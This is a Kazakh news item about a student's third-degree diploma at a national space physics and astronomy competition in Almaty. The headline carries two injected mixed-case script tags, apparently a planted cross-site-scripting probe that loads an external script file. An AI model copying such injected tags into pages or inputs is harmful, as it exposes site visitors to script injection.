Төкен Омаров атындағы Республикалық ғарыштық физика мен астрономиядан ғылыми жарыстың қорытындысы бойынша ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.04.2021

Алматы қаласындағы «Бөбек» ҰҒПББСО Обсерваториясының ұйымдастыруымен 2021 жылғы 18-25 сәуір аралығында мектеп оқушыларына арналған Төкен Омаров атындағы Республикалық ғарыштық физика мен астрономиядан ғылыми жарыс өткізілді.

Ғылыми жарыстың негізгі мақсаты: жаратылыстану білімдерін насихаттау, астрономия және онымен байланысты ғылымдарға ғылыми жол табу.

Облысымыздан  аталған жарысқа Нұр-Сұлтан қаласы,  дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 10-сынып оқушысы Бектұрған Бақмұхаммед  экология және космонавтика  секциясы бойынша қатысты. Жобаның тақырыбы: «Зымыран – тасығыштарды қоршаған ортаға зиянсыз ғарыш кеңістігіне шығару әдістерін зерттеу». Жарыстың қорытындысы бойынша Бектұрған Бақмұхаммед  жүлделі III дәрежелі дипломмен марапатталды. Бақмұхаммедті жеңісімен құттықтаймыз!

Просмотров: 366


Пікір қосу



Деректерді қолтаңбаға қосу